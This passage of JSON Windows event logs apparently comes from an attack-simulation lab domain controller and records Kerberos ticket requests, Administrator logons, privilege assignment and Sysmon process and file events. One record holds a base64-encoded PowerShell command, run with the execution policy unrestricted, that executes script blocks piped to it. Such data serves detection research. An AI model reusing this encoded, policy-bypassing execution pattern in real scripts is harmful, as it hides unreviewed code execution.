05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220605,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220606,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220607,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220608,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9D9DC\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9d9dc","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220609,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9D9DC\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9d9dc","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5119,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:43.031\r\nProcessGuid: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nProcessId: 2776\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\4ioguru5.dll\r\nCreationUtcTime: 2020-08-01 05:52:43.031","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:43.031","ProcessGuid":"{A837DB8D-032A-5F25-0000-001045CE0900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4ioguru5.dll","CreationUtcTime":"2020-08-01 05:52:43.031","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5120,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.031\r\nProcessGuid: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nProcessId: 2776\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\4ioguru5.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:43.031","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.031","ProcessGuid":"{A837DB8D-032A-5F25-0000-001045CE0900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4ioguru5.cmdline","CreationUtcTime":"2020-08-01 05:52:43.031","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5121,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.046\r\nProcessGuid: {A837DB8D-032B-5F25-0000-001073E00900}\r\nProcessId: 2984\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4ioguru5.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nParentProcessId: 2776\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.046","ProcessGuid":"{A837DB8D-032B-5F25-0000-001073E00900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4ioguru5.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-032A-5F25-0000-001045CE0900}","ParentProcessId":"2776","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5122,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.031\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nSourceProcessId: 2776\r\nSourceThreadId: 5084\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BB68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.031","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","SourceProcessId":"2776","SourceThreadId":"5084","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-0010C9B90700}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BB68F)","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5123,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.031\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.031","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-0010C9B90700}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
